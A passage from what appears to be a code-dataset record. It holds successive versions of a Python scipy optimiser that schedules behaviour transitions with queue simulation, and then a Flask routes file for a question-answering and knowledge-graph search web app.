optimal behaviour transition through the BTG.\n\n :paths -> iterable of path-iterables, path-domain for optimization\n Each path-iterable contains only behaviour_id.\n :Behaviour_Table -> Dict of the form {behaviour_id: <behaviour_vec>}\n Must contain all behaviours in btg\n :btg -> Behaviour Transition Graph, nodes are behaviour_ids,\n dictionary of the form {(v_1, v_2): tau_1,2}\n :F -> Prediction matrix, of shape (|b_vec|, n),\n where n is int(T_max/dt)\n :dt -> Prediction time-resolution\n :Acc0 -> Initial queue Accumulator (queue length) value, defaults 0.\n \"\"\"\n Acc0 = np.zeros(F.shape[0]) if Acc0 is None else Acc0\n Solutions = []\n t_max = int((F.shape[-1] - 1) * dt)\n initial_T = F.sum() / len(paths[0])\n for path in paths:\n L, x0, bounds, step_taker = opt_params(path, Behaviour_Table, BTG,\n t_max, F, dt=dt, Acc0=Acc0)\n minimizer_kwargs = {'method': method, 'bounds': bounds.SLSQP_bounds\n (), 'constraints': bounds.SLSQP_constraints()[method.lower()]}\n result = basinhopping(L, x0.copy(), accept_test=bounds, take_step=\n step_taker, stepsize=10 * dt, niter=maxiter, T=initial_T,\n interval=20, minimizer_kwargs=minimizer_kwargs)\n Solutions.append(result)\n i, BestPath = min(((i, s) for i, s in enumerate(Solutions)), key=lambda\n x: x[1].fun)\n return paths[i], BestPath\n\n\ndef opt_params(path, BTable, BTG, t_max, F, dt, Acc0, q_acc_model=qsim.\n integrator, q_acc_model_args=[], q_model_kwargs={}, q_relief_model=qsim\n .linear_relief, deadtime_penalty=4):\n \"\"\"Generates the components necessary to completely specify\n best-path optimization routine. (With a queue model)\n\n Returns:\n :Lagrangian Objective Function L(x) -> Contains a Barrier Component\n :x0 -> an initial realizeable solution\n :bounds -> a Bounds() object, that defines surrounding hyper-volume for x\n \"\"\"\n B = np.vstack(BTable[bid] for bid in path)\n taus = transition_costs(path, BTG)\n x0 = initial_soln(path, t_max)\n bounds = Bounds(0.0, (F.shape[-1] - 1) * dt, taus)\n\n def cost(x, p=deadtime_penalty):\n \"\"\"Simulate the queue effects, and then evaluate the objective function\n on the simulation result\"\"\"\n k = F.shape[1] if F.shape[1] > 0 else 1\n avg_rates = F.sum(1) / k\n Z, Acc = qsim.cascading_relief(F, path, x, costs=taus, BTable=\n BTable, Acc0=Acc0, relief_mode_kwargs={'rate': 0.5})\n cum_Z = np.cumsum(Z, axis=1)\n Deadtimes = np.where(Z == 0, 0, 1).sum(1)\n return -obj(x, B, cum_Z, taus, dt=dt) + 0.25 * avg_rates.dot(Deadtimes\n ) ** 2 - avg_rates.sum() * Acc.sum()\n step_taker = Stepper(bounds, 10, 20)\n return cost, x0, bounds, step_taker\n\n\n<mask token>\n\n\ndef parse_behaviours(behaviours, dtype=np.float32):\n \"\"\"[(bid, [bvec])] -> {bid: <bvec>}\"\"\"\n return {bid: np.array(bvec).sum(1) for bid, bvec in behaviours}\n\n\ndef parse_prediction(F):\n \"\"\"[[float]] -> np.array(...) of same shape\"\"\"\n return np.array(F)\n\n\n<mask token>\n\n\ndef range_sum(cum_F, a, b, penalty=-1000):\n \"\"\"Penalty brutally dominates any out-of-index operation...\"\"\"\n z = cum_F.shape[-1] - 1\n if not 0 <= a <= z or not 0 <= b <= z:\n return np.ones(cum_F.shape[0]) * penalty\n return cum_F[..., b] - cum_F[..., a]\n\n\n<mask token>\n\n\ndef barrier(times, path, BTG):\n \"\"\"Handles Linear/causality Constraints with respect to transitions\"\"\"\n t = [0] + list(times)\n S = 0.0\n for i in xrange(len(path) - 1):\n edge = path[i], path[i + 1]\n tau = BTG[edge]\n S += min(0, t[i + 1] - t[i] - tau)\n return S\n",
"step-3": "<mask token>\n\n\nclass Bounds(object):\n \"\"\"Required for acceptance testing in scipy.optimize.basinhopping\"\"\"\n\n def __init__(self, xmin, xmax, costs):\n self.xmax = xmax\n self.xmin = xmin\n self.costs = costs\n\n def is_valid(self, x):\n tmax = bool(np.all(x <= self.xmax))\n tmin = bool(np.all(x >= self.xmin))\n in_order = [(x[i] + c <= x[i + 1]) for i, c in enumerate(self.costs\n [1:])]\n in_order.append(x[0] <= self.costs[0])\n return tmax and tmin and all(in_order)\n\n def __call__(self, **kwargs):\n x = kwargs['x_new']\n return self.is_valid(x)\n\n def SLSQP_constraints(self):\n \"\"\"Return inequality constraints for SLSQP,\n in particular, assert that 0 >= x_i - x_i-1 forall i\"\"\"\n funs = [(lambda x: x[i + 1] - x[i] + c) for i, c in enumerate(self.\n costs[1:])]\n funs.append(lambda x: x[0] + self.costs[0])\n funs += [(lambda x: x[i]) for i in xrange(len(self.costs))]\n funs += [lambda x: -x[i]]\n n = len(self.costs)\n neg = np.identity(n) * -1\n rhs1 = np.ones(n) * self.xmin\n rhs1[0] += self.costs[0]\n tmax = np.identity(n)\n rhs2 = np.ones(n) * self.xmax\n A = np.vstack((neg, tmax))\n b = np.hstack((rhs1, rhs2))\n if n >= 2:\n root = [1, -1] + [0] * (n - 2)\n z = np.vstack([np.roll(root, i) for i in xrange(n - 1)])\n rhs3 = np.array(self.costs[1:])\n A = np.vstack((A, z))\n b = np.hstack((b, rhs3))\n return {'slsqp': {'type': 'ineq', 'fun': lambda x: b - np.dot(A, x)\n }, 'cobyla': [{'type': 'ineq', 'fun': f} for f in funs]}\n\n def SLSQP_bounds(self):\n \"\"\"Return bounds as sequence\"\"\"\n return [(self.xmin, self.xmax) for i in xrange(len(self.costs))]\n\n\nclass Stepper(object):\n\n def __init__(self, bounds, stepsize=10, max_iter=20, deflate=0.5):\n self.bounds = bounds\n self.stepsize = stepsize\n self.max_iter = max_iter\n self.deflate = deflate\n\n def __call__(self, x):\n y = None\n for i in xrange(self.max_iter):\n B = self.deflate ** (i + 1)\n r = self.stepsize * B\n u = np.random.uniform(-r, r, x.shape)\n if self.bounds.is_valid(x + u):\n x += u\n return x\n return x\n\n\ndef optimize_path(paths, behaviours, btg, start, prediction, dt, maxiter):\n \"\"\"Erlang Entry Point to Optimization Module\"\"\"\n B_table = parse_behaviours(behaviours)\n BTG = parse_edgelist(btg)\n F = parse_prediction(prediction)\n path, t = best_path(paths, B_table, BTG, F, dt=dt, maxiter=10)\n return list(path), map(lambda x: int(x) + start, t.x)\n\n\ndef best_path(paths, Behaviour_Table, BTG, F, dt=1.0, maxiter=20, Acc0=None,\n method='SLSQP'):\n \"\"\"\n Perform the mixed ILP optimization (without queues, or memory), that yields\n the optimal behaviour transition through the BTG.\n\n :paths -> iterable of path-iterables, path-domain for optimization\n Each path-iterable contains only behaviour_id.\n :Behaviour_Table -> Dict of the form {behaviour_id: <behaviour_vec>}\n Must contain all behaviours in btg\n :btg -> Behaviour Transition Graph, nodes are behaviour_ids,\n dictionary of the form {(v_1, v_2): tau_1,2}\n :F -> Prediction matrix, of shape (|b_vec|, n),\n where n is int(T_max/dt)\n :dt -> Prediction time-resolution\n :Acc0 -> Initial queue Accumulator (queue length) value, defaults 0.\n \"\"\"\n Acc0 = np.zeros(F.shape[0]) if Acc0 is None else Acc0\n Solutions = []\n t_max = int((F.shape[-1] - 1) * dt)\n initial_T = F.sum() / len(paths[0])\n for path in paths:\n L, x0, bounds, step_taker = opt_params(path, Behaviour_Table, BTG,\n t_max, F, dt=dt, Acc0=Acc0)\n minimizer_kwargs = {'method': method, 'bounds': bounds.SLSQP_bounds\n (), 'constraints': bounds.SLSQP_constraints()[method.lower()]}\n result = basinhopping(L, x0.copy(), accept_test=bounds, take_step=\n step_taker, stepsize=10 * dt, niter=maxiter, T=initial_T,\n interval=20, minimizer_kwargs=minimizer_kwargs)\n Solutions.append(result)\n i, BestPath = min(((i, s) for i, s in enumerate(Solutions)), key=lambda\n x: x[1].fun)\n return paths[i], BestPath\n\n\ndef opt_params(path, BTable, BTG, t_max, F, dt, Acc0, q_acc_model=qsim.\n integrator, q_acc_model_args=[], q_model_kwargs={}, q_relief_model=qsim\n .linear_relief, deadtime_penalty=4):\n \"\"\"Generates the components necessary to completely specify\n best-path optimization routine. (With a queue model)\n\n Returns:\n :Lagrangian Objective Function L(x) -> Contains a Barrier Component\n :x0 -> an initial realizeable solution\n :bounds -> a Bounds() object, that defines surrounding hyper-volume for x\n \"\"\"\n B = np.vstack(BTable[bid] for bid in path)\n taus = transition_costs(path, BTG)\n x0 = initial_soln(path, t_max)\n bounds = Bounds(0.0, (F.shape[-1] - 1) * dt, taus)\n\n def cost(x, p=deadtime_penalty):\n \"\"\"Simulate the queue effects, and then evaluate the objective function\n on the simulation result\"\"\"\n k = F.shape[1] if F.shape[1] > 0 else 1\n avg_rates = F.sum(1) / k\n Z, Acc = qsim.cascading_relief(F, path, x, costs=taus, BTable=\n BTable, Acc0=Acc0, relief_mode_kwargs={'rate': 0.5})\n cum_Z = np.cumsum(Z, axis=1)\n Deadtimes = np.where(Z == 0, 0, 1).sum(1)\n return -obj(x, B, cum_Z, taus, dt=dt) + 0.25 * avg_rates.dot(Deadtimes\n ) ** 2 - avg_rates.sum() * Acc.sum()\n step_taker = Stepper(bounds, 10, 20)\n return cost, x0, bounds, step_taker\n\n\ndef parse_edgelist(edges):\n \"\"\"[((a, b), tau)] -> {(a, b): tau}\"\"\"\n return {(a, b): tau for (a, b), tau in edges}\n\n\ndef parse_behaviours(behaviours, dtype=np.float32):\n \"\"\"[(bid, [bvec])] -> {bid: <bvec>}\"\"\"\n return {bid: np.array(bvec).sum(1) for bid, bvec in behaviours}\n\n\ndef parse_prediction(F):\n \"\"\"[[float]] -> np.array(...) of same shape\"\"\"\n return np.array(F)\n\n\ndef initial_soln(path, t_max):\n \"\"\"Evenly Distributed, no check for taus\"\"\"\n j = t_max / len(path)\n return np.array([((i + 1) * j) for i in xrange(len(path) - 1)])\n\n\ndef transition_costs(path, btg):\n \"\"\"Sequence of transition costs associated with the prescribed path\"\"\"\n return [btg[path[i], path[i + 1]] for i in xrange(len(path) - 1)]\n\n\ndef range_sum(cum_F, a, b, penalty=-1000):\n \"\"\"Penalty brutally dominates any out-of-index operation...\"\"\"\n z = cum_F.shape[-1] - 1\n if not 0 <= a <= z or not 0 <= b <= z:\n return np.ones(cum_F.shape[0]) * penalty\n return cum_F[..., b] - cum_F[..., a]\n\n\ndef flow_served(cum_F, times, costs, queue_model=None, dt=1.0):\n \"\"\"Times: [t1, ..., td],\n costs: [t_{b0, b1}, t_{b1, b2}, ...]\n Returns the Fulfillment matrix associated with each behaviour segment.\"\"\"\n discr_index = lambda x: int(x / dt) - 1\n t_steps = [0] + map(discr_index, times)\n t_steps.append(cum_F.shape[-1] - 1)\n c_steps = [0] + map(discr_index, costs)\n result = np.vstack([range_sum(cum_F, t_steps[i] + c_steps[i], t_steps[i +\n 1]) for i in xrange(len(costs) + 1)])\n return result\n\n\ndef obj(times, B, cum_F, costs, dt=1.0):\n \"\"\"Objective Function for Hillclimbing\"\"\"\n Z = B * flow_served(cum_F, times, costs, dt=dt)\n return Z.sum()\n\n\ndef barrier(times, path, BTG):\n \"\"\"Handles Linear/causality Constraints with respect to transitions\"\"\"\n t = [0] + list(times)\n S = 0.0\n for i in xrange(len(path) - 1):\n edge = path[i], path[i + 1]\n tau = BTG[edge]\n S += min(0, t[i + 1] - t[i] - tau)\n return S\n",
"step-4": "from erlport.erlterms import Atom\nfrom scipy.optimize import basinhopping\nimport numpy as np\nimport qsim\n\n\nclass Bounds(object):\n \"\"\"Required for acceptance testing in scipy.optimize.basinhopping\"\"\"\n\n def __init__(self, xmin, xmax, costs):\n self.xmax = xmax\n self.xmin = xmin\n self.costs = costs\n\n def is_valid(self, x):\n tmax = bool(np.all(x <= self.xmax))\n tmin = bool(np.all(x >= self.xmin))\n in_order = [(x[i] + c <= x[i + 1]) for i, c in enumerate(self.costs\n [1:])]\n in_order.append(x[0] <= self.costs[0])\n return tmax and tmin and all(in_order)\n\n def __call__(self, **kwargs):\n x = kwargs['x_new']\n return self.is_valid(x)\n\n def SLSQP_constraints(self):\n \"\"\"Return inequality constraints for SLSQP,\n in particular, assert that 0 >= x_i - x_i-1 forall i\"\"\"\n funs = [(lambda x: x[i + 1] - x[i] + c) for i, c in enumerate(self.\n costs[1:])]\n funs.append(lambda x: x[0] + self.costs[0])\n funs += [(lambda x: x[i]) for i in xrange(len(self.costs))]\n funs += [lambda x: -x[i]]\n n = len(self.costs)\n neg = np.identity(n) * -1\n rhs1 = np.ones(n) * self.xmin\n rhs1[0] += self.costs[0]\n tmax = np.identity(n)\n rhs2 = np.ones(n) * self.xmax\n A = np.vstack((neg, tmax))\n b = np.hstack((rhs1, rhs2))\n if n >= 2:\n root = [1, -1] + [0] * (n - 2)\n z = np.vstack([np.roll(root, i) for i in xrange(n - 1)])\n rhs3 = np.array(self.costs[1:])\n A = np.vstack((A, z))\n b = np.hstack((b, rhs3))\n return {'slsqp': {'type': 'ineq', 'fun': lambda x: b - np.dot(A, x)\n }, 'cobyla': [{'type': 'ineq', 'fun': f} for f in funs]}\n\n def SLSQP_bounds(self):\n \"\"\"Return bounds as sequence\"\"\"\n return [(self.xmin, self.xmax) for i in xrange(len(self.costs))]\n\n\nclass Stepper(object):\n\n def __init__(self, bounds, stepsize=10, max_iter=20, deflate=0.5):\n self.bounds = bounds\n self.stepsize = stepsize\n self.max_iter = max_iter\n self.deflate = deflate\n\n def __call__(self, x):\n y = None\n for i in xrange(self.max_iter):\n B = self.deflate ** (i + 1)\n r = self.stepsize * B\n u = np.random.uniform(-r, r, x.shape)\n if self.bounds.is_valid(x + u):\n x += u\n return x\n return x\n\n\ndef optimize_path(paths, behaviours, btg, start, prediction, dt, maxiter):\n \"\"\"Erlang Entry Point to Optimization Module\"\"\"\n B_table = parse_behaviours(behaviours)\n BTG = parse_edgelist(btg)\n F = parse_prediction(prediction)\n path, t = best_path(paths, B_table, BTG, F, dt=dt, maxiter=10)\n return list(path), map(lambda x: int(x) + start, t.x)\n\n\ndef best_path(paths, Behaviour_Table, BTG, F, dt=1.0, maxiter=20, Acc0=None,\n method='SLSQP'):\n \"\"\"\n Perform the mixed ILP optimization (without queues, or memory), that yields\n the optimal behaviour transition through the BTG.\n\n :paths -> iterable of path-iterables, path-domain for optimization\n Each path-iterable contains only behaviour_id.\n :Behaviour_Table -> Dict of the form {behaviour_id: <behaviour_vec>}\n Must contain all behaviours in btg\n :btg -> Behaviour Transition Graph, nodes are behaviour_ids,\n dictionary of the form {(v_1, v_2): tau_1,2}\n :F -> Prediction matrix, of shape (|b_vec|, n),\n where n is int(T_max/dt)\n :dt -> Prediction time-resolution\n :Acc0 -> Initial queue Accumulator (queue length) value, defaults 0.\n \"\"\"\n Acc0 = np.zeros(F.shape[0]) if Acc0 is None else Acc0\n Solutions = []\n t_max = int((F.shape[-1] - 1) * dt)\n initial_T = F.sum() / len(paths[0])\n for path in paths:\n L, x0, bounds, step_taker = opt_params(path, Behaviour_Table, BTG,\n t_max, F, dt=dt, Acc0=Acc0)\n minimizer_kwargs = {'method': method, 'bounds': bounds.SLSQP_bounds\n (), 'constraints': bounds.SLSQP_constraints()[method.lower()]}\n result = basinhopping(L, x0.copy(), accept_test=bounds, take_step=\n step_taker, stepsize=10 * dt, niter=maxiter, T=initial_T,\n interval=20, minimizer_kwargs=minimizer_kwargs)\n Solutions.append(result)\n i, BestPath = min(((i, s) for i, s in enumerate(Solutions)), key=lambda\n x: x[1].fun)\n return paths[i], BestPath\n\n\ndef opt_params(path, BTable, BTG, t_max, F, dt, Acc0, q_acc_model=qsim.\n integrator, q_acc_model_args=[], q_model_kwargs={}, q_relief_model=qsim\n .linear_relief, deadtime_penalty=4):\n \"\"\"Generates the components necessary to completely specify\n best-path optimization routine. (With a queue model)\n\n Returns:\n :Lagrangian Objective Function L(x) -> Contains a Barrier Component\n :x0 -> an initial realizeable solution\n :bounds -> a Bounds() object, that defines surrounding hyper-volume for x\n \"\"\"\n B = np.vstack(BTable[bid] for bid in path)\n taus = transition_costs(path, BTG)\n x0 = initial_soln(path, t_max)\n bounds = Bounds(0.0, (F.shape[-1] - 1) * dt, taus)\n\n def cost(x, p=deadtime_penalty):\n \"\"\"Simulate the queue effects, and then evaluate the objective function\n on the simulation result\"\"\"\n k = F.shape[1] if F.shape[1] > 0 else 1\n avg_rates = F.sum(1) / k\n Z, Acc = qsim.cascading_relief(F, path, x, costs=taus, BTable=\n BTable, Acc0=Acc0, relief_mode_kwargs={'rate': 0.5})\n cum_Z = np.cumsum(Z, axis=1)\n Deadtimes = np.where(Z == 0, 0, 1).sum(1)\n return -obj(x, B, cum_Z, taus, dt=dt) + 0.25 * avg_rates.dot(Deadtimes\n ) ** 2 - avg_rates.sum() * Acc.sum()\n step_taker = Stepper(bounds, 10, 20)\n return cost, x0, bounds, step_taker\n\n\ndef parse_edgelist(edges):\n \"\"\"[((a, b), tau)] -> {(a, b): tau}\"\"\"\n return {(a, b): tau for (a, b), tau in edges}\n\n\ndef parse_behaviours(behaviours, dtype=np.float32):\n \"\"\"[(bid, [bvec])] -> {bid: <bvec>}\"\"\"\n return {bid: np.array(bvec).sum(1) for bid, bvec in behaviours}\n\n\ndef parse_prediction(F):\n \"\"\"[[float]] -> np.array(...) of same shape\"\"\"\n return np.array(F)\n\n\ndef initial_soln(path, t_max):\n \"\"\"Evenly Distributed, no check for taus\"\"\"\n j = t_max / len(path)\n return np.array([((i + 1) * j) for i in xrange(len(path) - 1)])\n\n\ndef transition_costs(path, btg):\n \"\"\"Sequence of transition costs associated with the prescribed path\"\"\"\n return [btg[path[i], path[i + 1]] for i in xrange(len(path) - 1)]\n\n\ndef range_sum(cum_F, a, b, penalty=-1000):\n \"\"\"Penalty brutally dominates any out-of-index operation...\"\"\"\n z = cum_F.shape[-1] - 1\n if not 0 <= a <= z or not 0 <= b <= z:\n return np.ones(cum_F.shape[0]) * penalty\n return cum_F[..., b] - cum_F[..., a]\n\n\ndef flow_served(cum_F, times, costs, queue_model=None, dt=1.0):\n \"\"\"Times: [t1, ..., td],\n costs: [t_{b0, b1}, t_{b1, b2}, ...]\n Returns the Fulfillment matrix associated with each behaviour segment.\"\"\"\n discr_index = lambda x: int(x / dt) - 1\n t_steps = [0] + map(discr_index, times)\n t_steps.append(cum_F.shape[-1] - 1)\n c_steps = [0] + map(discr_index, costs)\n result = np.vstack([range_sum(cum_F, t_steps[i] + c_steps[i], t_steps[i +\n 1]) for i in xrange(len(costs) + 1)])\n return result\n\n\ndef obj(times, B, cum_F, costs, dt=1.0):\n \"\"\"Objective Function for Hillclimbing\"\"\"\n Z = B * flow_served(cum_F, times, costs, dt=dt)\n return Z.sum()\n\n\ndef barrier(times, path, BTG):\n \"\"\"Handles Linear/causality Constraints with respect to transitions\"\"\"\n t = [0] + list(times)\n S = 0.0\n for i in xrange(len(path) - 1):\n edge = path[i], path[i + 1]\n tau = BTG[edge]\n S += min(0, t[i + 1] - t[i] - tau)\n return S\n",
"step-5": "from erlport.erlterms import Atom\nfrom scipy.optimize import basinhopping\nimport numpy as np\nimport qsim\n\nclass Bounds(object):\n '''Required for acceptance testing in scipy.optimize.basinhopping'''\n def __init__(self, xmin, xmax, costs):\n self.xmax = xmax\n self.xmin = xmin\n self.costs = costs\n\n def is_valid(self, x):\n tmax = bool(np.all(x <= self.xmax))\n tmin = bool(np.all(x >= self.xmin))\n in_order = [x[i] + c <= x[i+1] for i, c in enumerate(self.costs[1:])]\n in_order.append(x[0] <= self.costs[0])\n return tmax and tmin and all(in_order)\n\n def __call__(self, **kwargs):\n x = kwargs[\"x_new\"]\n return self.is_valid(x)\n\n def SLSQP_constraints(self):\n '''Return inequality constraints for SLSQP,\n in particular, assert that 0 >= x_i - x_i-1 forall i'''\n funs = [lambda x: x[i + 1] - x[i] + c\n for i, c in enumerate(self.costs[1:])]\n funs.append(lambda x: x[0] + self.costs[0])\n funs += [lambda x: x[i] for i in xrange(len(self.costs))]\n funs += [lambda x: -x[i]]\n\n # im matrix form\n n = len(self.costs)\n # -x_i <= 0\n neg = np.identity(n) * -1\n rhs1 = np.ones(n) * self.xmin\n rhs1[0] += self.costs[0]\n # tmax constraints\n tmax = np.identity(n)\n rhs2 = np.ones(n) * self.xmax\n # cost constraints\n A = np.vstack((neg, tmax))\n b = np.hstack((rhs1, rhs2))\n if n >= 2:\n root = [1, -1] + [0] * (n - 2)\n z = np.vstack([np.roll(root, i) for i in xrange(n-1)])\n rhs3 = np.array(self.costs[1:])\n A = np.vstack((A, z))\n b = np.hstack((b, rhs3))\n return {\"slsqp\": {'type': 'ineq', 'fun': lambda x: b - np.dot(A, x)},\n \"cobyla\": [{'type': 'ineq', 'fun': f} for f in funs]}\n\n def SLSQP_bounds(self):\n '''Return bounds as sequence'''\n return [(self.xmin, self.xmax) for i in xrange(len(self.costs))]\n\n\n\nclass Stepper(object):\n def __init__(self, bounds, stepsize=10, max_iter=20, deflate=0.5):\n self.bounds = bounds\n self.stepsize = stepsize\n self.max_iter = max_iter\n self.deflate = deflate\n\n def __call__(self, x):\n y = None\n for i in xrange(self.max_iter):\n B = self.deflate ** (i + 1)\n r = self.stepsize * B\n u = np.random.uniform(-r, r, x.shape)\n if self.bounds.is_valid(x + u):\n x += u\n return x\n return x\n\n\ndef optimize_path(paths, behaviours, btg, start, prediction, dt, maxiter):\n '''Erlang Entry Point to Optimization Module'''\n B_table = parse_behaviours(behaviours)\n BTG = parse_edgelist(btg)\n F = parse_prediction(prediction)\n\n path, t = best_path(paths, B_table, BTG, F, dt=dt, maxiter=10)\n return list(path), map(lambda x: int(x) + start, t.x)\n\n\ndef best_path(paths, Behaviour_Table, BTG, F, dt=1.,\n maxiter=20, Acc0=None, method=\"SLSQP\"):\n '''\n Perform the mixed ILP optimization (without queues, or memory), that yields\n the optimal behaviour transition through the BTG.\n\n :paths -> iterable of path-iterables, path-domain for optimization\n Each path-iterable contains only behaviour_id.\n :Behaviour_Table -> Dict of the form {behaviour_id: <behaviour_vec>}\n Must contain all behaviours in btg\n :btg -> Behaviour Transition Graph, nodes are behaviour_ids,\n dictionary of the form {(v_1, v_2): tau_1,2}\n :F -> Prediction matrix, of shape (|b_vec|, n),\n where n is int(T_max/dt)\n :dt -> Prediction time-resolution\n :Acc0 -> Initial queue Accumulator (queue length) value, defaults 0.\n '''\n # Given a particular path, find the optimal times to transition\n Acc0 = np.zeros(F.shape[0]) if Acc0 is None else Acc0\n\n Solutions = []\n t_max = int((F.shape[-1] - 1) * dt)\n initial_T = F.sum() / len(paths[0])\n for path in paths:\n L, x0, bounds, step_taker = opt_params(path, Behaviour_Table,\n BTG, t_max, F, dt=dt, Acc0=Acc0)\n\n minimizer_kwargs = {'method': method, 'bounds': bounds.SLSQP_bounds(),\n 'constraints': bounds.SLSQP_constraints()[method.lower()],\n }\n result = basinhopping(L, x0.copy(),\n accept_test=bounds,\n take_step=step_taker, stepsize=10*dt,\n niter=maxiter, T=initial_T,\n interval=20,\n minimizer_kwargs=minimizer_kwargs)\n Solutions.append(result)\n\n i, BestPath = min(((i, s) for i, s in enumerate(Solutions)),\n key=lambda x: x[1].fun)\n return paths[i], BestPath\n\n\ndef opt_params(path, BTable, BTG, t_max, F, dt, Acc0,\n q_acc_model=qsim.integrator, q_acc_model_args=[], q_model_kwargs={},\n q_relief_model=qsim.linear_relief,\n deadtime_penalty=4):\n '''Generates the components necessary to completely specify\n best-path optimization routine. (With a queue model)\n\n Returns:\n :Lagrangian Objective Function L(x) -> Contains a Barrier Component\n :x0 -> an initial realizeable solution\n :bounds -> a Bounds() object, that defines surrounding hyper-volume for x\n '''\n B = np.vstack(BTable[bid] for bid in path) # Behaviour Matrix (d,4)\n taus = transition_costs(path, BTG)\n x0 = initial_soln(path, t_max)\n bounds = Bounds(0., (F.shape[-1] - 1) * dt, taus)\n\n def cost(x, p=deadtime_penalty):\n '''Simulate the queue effects, and then evaluate the objective function\n on the simulation result'''\n k = F.shape[1] if F.shape[1] > 0 else 1\n avg_rates = F.sum(1) / k\n Z, Acc = qsim.cascading_relief(F, path, x, costs=taus, BTable=BTable,\n Acc0=Acc0, relief_mode_kwargs={\"rate\": 0.5})\n cum_Z = np.cumsum(Z, axis=1)\n\n Deadtimes = np.where(Z == 0, 0, 1).sum(1)\n\n return (-obj(x, B, cum_Z, taus, dt=dt)\n + 0.25* avg_rates.dot(Deadtimes) ** 2\n - avg_rates.sum()*Acc.sum()) # ????\n\n\n step_taker = Stepper(bounds, 10, 20)\n return cost, x0, bounds, step_taker\n\n\n# Parsers ###############################################################\ndef parse_edgelist(edges):\n '''[((a, b), tau)] -> {(a, b): tau}'''\n return {(a, b): tau for (a, b), tau in edges}\n\ndef parse_behaviours(behaviours, dtype=np.float32):\n '''[(bid, [bvec])] -> {bid: <bvec>}'''\n return {bid: np.array(bvec).sum(1) for bid, bvec in behaviours}\n\ndef parse_prediction(F):\n '''[[float]] -> np.array(...) of same shape'''\n return np.array(F) # Might not work, will check back later\n\n\n# Optimization ###############################################################\ndef initial_soln(path, t_max):\n '''Evenly Distributed, no check for taus'''\n j = t_max / len(path)\n return np.array([(i + 1) * j for i in xrange(len(path) - 1)])\n\ndef transition_costs(path, btg):\n '''Sequence of transition costs associated with the prescribed path'''\n return [btg[(path[i], path[i+1])] for i in xrange(len(path) - 1)]\n\ndef range_sum(cum_F, a, b, penalty=-1000):\n '''Penalty brutally dominates any out-of-index operation...'''\n z = cum_F.shape[-1] - 1\n if (not 0 <= a <= z) or (not 0 <= b <= z):\n return np.ones(cum_F.shape[0]) * penalty\n return cum_F[..., b] - cum_F[..., a]\n\ndef flow_served(cum_F, times, costs, queue_model=None, dt=1.):\n '''Times: [t1, ..., td],\n costs: [t_{b0, b1}, t_{b1, b2}, ...]\n Returns the Fulfillment matrix associated with each behaviour segment.'''\n discr_index = lambda x: int(x / dt) - 1\n t_steps = [0] + map(discr_index, times)\n t_steps.append(cum_F.shape[-1] - 1) # t_max\n\n c_steps = [0] + map(discr_index, costs)\n\n result = np.vstack([range_sum(cum_F, t_steps[i] + c_steps[i], t_steps[i + 1])\n for i in xrange(len(costs) + 1)])\n return result\n\ndef obj(times, B, cum_F, costs, dt=1.):\n '''Objective Function for Hillclimbing'''\n Z = B * flow_served(cum_F, times, costs, dt=dt)\n return Z.sum()\n\ndef barrier(times, path, BTG):\n '''Handles Linear/causality Constraints with respect to transitions'''\n t = [0] + list(times)\n S = 0.\n for i in xrange(len(path) - 1):\n edge = (path[i], path[i + 1])\n tau = BTG[edge]\n S += min(0, (t[i + 1] - t[i] - tau)) # Only accrue if constraint is voilated\n return S\n",
"step-ids": [
16,
17,
22,
23,
24
]
}
|
[
16,
17,
22,
23,
24
] |
"""
Routes and views for the flask application.
"""
from datetime import datetime
from flask import render_template, redirect, url_for, request, jsonify
from athena_App import app
from athena_App.formClass import QuestionForm
import time
#attention:
#this module include large word vector which need a lot of time to load
#turn it off when when you debugging other module
#
#from athena_App.data_process.es_QAsearch import *
#
#from athena_App.data_process.keywordCompare import Keyword_Compare, Answer
#from athena_App.data_process.word2vecCompareModel import *
#from athena_App.data_process.graph_query import *
#from athena_App.openlaw.graphOfcase_query_echart import *
#reconstruct series
from athena_App.layer_frontInteracting.qa_module import answerFinder
from athena_App.layer_frontInteracting.kg_module import knowledgeSearch
from athena_App.layer_frontInteracting.case_module import caseQuery
@app.route('/QAsearch', methods=['POST','GET'])
def QAsearch():
"""Renders the QAsearch page."""
question = ''
form = QuestionForm()
question = form.question.data
if form.validate_on_submit():
return redirect(url_for('answer',word=question))
return render_template(
'QAsearch.html',
title = 'QAsearch Page',
year = datetime.now().year,
form = form,
question = question
)
@app.route('/instruction')
def instruction():
"""Renders the instruction page."""
return render_template(
'instruction.html',
title='说明',
year=datetime.now().year,
message='Instruction'
)
@app.route('/about')
def about():
"""Renders the about page."""
return render_template(
'about.html',
title='About',
year=datetime.now().year,
message='Your application description page.'
)
@app.route('/answer/<word>')
def answer(word):
"""Renders the answer page"""
print(word)
start=time.clock()
finder=answerFinder()
answer=finder.findANDpack(word)
end=time.clock()
print(str(end-start))
return render_template(
'answer.html',
title='Answer',
answer=answer
)
@app.route('/main')
@app.route('/')
def main():
return render_template(
'newMain.html',
title = 'Welcome Page',
year = datetime.now().year
)
@app.route('/graph_search',methods=['get','post'])
def graph_search():
return render_template(
'graph_search.html',
title = 'Graph search page',
year = datetime.now().year)
@app.route('/knowledge_search',methods=['get','post'])
def knowledge_search():
#initialize graph search object
searchKnowledge=knowledgeSearch()
des=request.args.get('description')
json_data=searchKnowledge.getTotalData_forKnowledgeSearch(des)
print(json_data)
return jsonify(json_data)
@app.route('/case_search_Test',methods=['get','post'])
def case_search_Test():
return render_template(
'case_search_Test.html',
title = 'Case search page',
year = datetime.now().year)
@app.route('/case_graph_search',methods=['get','post'])
def case_graph_search():
caseDes=request.args.get('caseDes')
#initialize graph search object
case_graph_result=caseQuery(caseDes)
pre_json_data=case_graph_result.getData()
print(pre_json_data)
return jsonify(pre_json_data)
@app.route('/knife',methods=['get','post'])
def knife():
return render_template(
'knife.html',
title = 'KNIFE SEARCH',
year = datetime.now().year
)
@app.route('/searchAll',methods=['get','post'])
def searchAll():
pass
|
normal
|
{
"blob_id": "3457a7c080da041ad279239bd6a3d214a3b8e49f",
"index": 6695,
